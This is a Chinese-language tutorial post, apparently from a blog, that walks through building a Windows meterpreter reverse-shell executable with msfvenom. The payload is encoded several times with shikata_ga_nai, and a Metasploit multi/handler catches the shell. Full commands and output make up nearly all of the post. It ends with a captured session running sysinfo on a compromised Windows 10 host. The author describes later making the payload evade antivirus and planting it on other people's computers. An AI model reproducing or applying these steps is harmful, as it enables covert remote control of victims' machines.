1.首先生成我们的小可爱,后期免杀后植入别人电脑中的.
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.25 lport=6666 -f exe > ./lyshark.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai succeeded with size 449 (iteration=3) x86/shikata_ga_nai succeeded with size 476 (iteration=4) x86/shikata_ga_nai chosen with final size 476 Payload size: 476 bytes Final size of exe file: 73802 bytes [root@localhost ~]# [root@localhost ~]# ls lyshark.exe
2.进入Metasploit,执行以下操作
[root@localhost ~]# msfconsole This copy of metasploit-framework is more than two weeks old. Consider running 'msfupdate' to update to the latest version. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% =[ metasploit v4.16.55-dev- ] + -- --=[ 1757 exploits - 1004 auxiliary - 306 post ] + -- --=[ 536 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >
msf > use exploit/multi/handler msf exploit(multi/handler) >
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target
msf exploit(multi/handler) > set lhost 192.168.1.25 lhost => 192.168.1.25 msf exploit(multi/handler) > set lport 6666 lport => 6666
3.将我们的小可爱(lyshark.exe)使用各种途径在目标主机上运行,之后会看到反弹了shell
msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.25:6666 [*] Sending stage (179779 bytes) to 192.168.1.10 [*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400 meterpreter >
4.此时主机已经沦陷,查看一下系统吧
meterpreter > sysinfo Computer : DESKTOP-CACDUAN OS : Windows 10 (Build 14393). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
注意:此方法必须要目标主机上运行才行,比较无脑!